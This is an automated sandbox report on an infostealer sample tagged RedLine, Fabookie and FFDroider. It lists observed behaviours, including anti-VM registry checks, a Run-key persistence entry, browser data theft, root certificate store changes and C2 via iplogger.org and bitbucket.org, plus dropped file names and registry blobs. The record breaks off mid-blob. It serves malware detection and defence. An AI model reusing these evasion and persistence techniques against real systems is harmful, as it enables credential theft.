Malware Analysis Report

2024-11-13 19:18

Sample ID 241109-y7c97s1jds
Target a3b251a139324a6df006eb9733c30199edf41dffe994ca0140296605613c2132
SHA256 a3b251a139324a6df006eb9733c30199edf41dffe994ca0140296605613c2132
Tags
fabookie ffdroider redline jameshook discovery evasion infostealer persistence spyware stealer themida trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

a3b251a139324a6df006eb9733c30199edf41dffe994ca0140296605613c2132

Threat Level: Known bad

The file a3b251a139324a6df006eb9733c30199edf41dffe994ca0140296605613c2132 was found to be: Known bad.

Malicious Activity Summary

fabookie ffdroider redline jameshook discovery evasion infostealer persistence spyware stealer themida trojan upx

Redline family

Detect Fabookie payload

FFDroider

RedLine

Fabookie

RedLine payload

Fabookie family

Ffdroider family

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Detected Nirsoft tools

Checks BIOS information in registry

Executes dropped EXE

Reads user/profile data of web browsers

Loads dropped DLL

Themida packer

Checks computer location settings

Checks whether UAC is enabled

Drops Chrome extension

Adds Run key to start application

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Checks installed software on the system

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

UPX packed file

Program crash

Unsigned PE

Browser Information Discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

NTFS ADS

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Modifies Internet Explorer settings

Kills process with taskkill

Modifies system certificate store

Suspicious use of AdjustPrivilegeToken

Enumerates system info in registry

Checks SCSI registry key(s)

Suspicious use of SendNotifyMessage

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-09 20:25

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-09 20:25

Reported

2024-11-09 20:27

Platform

win7-20240903-en

Max time kernel

149s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

FFDroider

stealer ffdroider

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

Ffdroider family

ffdroider

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

Detected Nirsoft tools

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\RarSFX2\per.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\RarSFX2\per.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\RarSFX2\per.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\secd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\secd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\secd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\secd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cld.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\update_b1f99b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\update_b1f99b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\update_b1f99b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\update_b1f99b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\piz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\piz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\piz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\piz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\quv.exe N/A

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng." C:\Users\Admin\AppData\Local\Temp\piz.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\RarSFX2\per.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\cld.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\secd.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A bitbucket.org N/A N/A
N/A bitbucket.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX2\per.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 468 set thread context of 2892 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\quv.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\quv.exe

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX1\quv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\cld.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX1\quv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RwJ2xhfygvdE.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regsvr32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\piz.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\asj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\file_clu.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\ubisoftant.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\md3_3kvm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\secd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\update_b1f99b.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000303eef0e2cd1a9499efdd285a56ddc5000000000020000000000106600000001000020000000f512686b6d97716c781d45a82d226ea381302566bab72bd9c30f871612abe6a0000000000e8000000002000020000000936f64b179328a24976fa0ab3d976228a97a13f063632d953545e7079f2707ea20000000404c84347f79aeafe9ffcaf1999aed374a70c2da32a110aec92177c88432d1fd400000005cb2fd77362aa8cac07e34232e2d1900d0a5f4207325a72913a9705173451146bc0ad801ba03fcc958cdfaaa3ef54d5fba9b30cbedd0b04c18486404c831eea0 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 1027108ce532db01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000303eef0e2cd1a9499efdd285a56ddc500000000002000000000010660000000100002000000055f17cac5198bfbc4890fe9aad38855ce94007b62515b2eb1b047264a08f2b35000000000e80000000020000200000006c6cd7fc4fdc7d68ddb6bc8cfaf6443a7f7b100ebebd960a2c975a3110f6763e90000000aa7a858f679b16def07ebc672c37e9194bf7fa95bdcff1e770142957e9d2efaa50a13f6219b843601c0b41f03a8dfb161fc969aa8642e55e15cd9de1df799704819d3bd23406cd6aa7afc48a593f7b7bcfb03f5be6c918156bb256d480335ce03deeb13905c0d52e28d23f64b2b2a77dd1b934f7a651ca486693937c0125d06e5e311ce6b2ebd130718b0303925d781a400000009ba29515f8ef774b4cff43a8002fd799461af5fd955ba9275cae66ec90b5091ed4490c5cb5202509c95c50e50ef7fcb94a6f214c2f006e4bd8fff14c3b0a5f46 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "437345791" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{BED705B1-9ED8-11EF-B984-5A85C185DB3E} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\asj.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\piz.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c4469676943657274204